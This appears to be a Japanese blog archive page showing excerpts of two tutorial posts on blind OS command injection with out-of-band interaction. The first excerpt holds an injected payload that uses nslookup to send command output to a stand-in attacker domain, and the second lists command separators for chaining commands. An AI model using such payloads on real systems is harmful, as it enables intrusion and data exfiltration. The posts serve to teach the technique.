2021-03-18から1日間の記事一覧
Hello there, ('ω')ノ 帯域外チャネルは、挿入されたコマンドから出力を抽出する簡単な方法を提供して。 whoamiで、コマンドの結果を含む攻撃者のドメインでDNS lookupが発生して。 例えば、下記のように。 & nslookup `whoami`.kgji2ohoyw.web-attacker.com…
Hello there, ('ω')ノ 帯域外の相互作用を伴うブラインドOSコマンドインジェクションを。 文字列はコマンドセパレータとして機能して。 コマンドをチェーン化できて。 下記のコマンドセパレータは、WindowsとUnixベースの両方で機能して。 &&&||| まずは、下…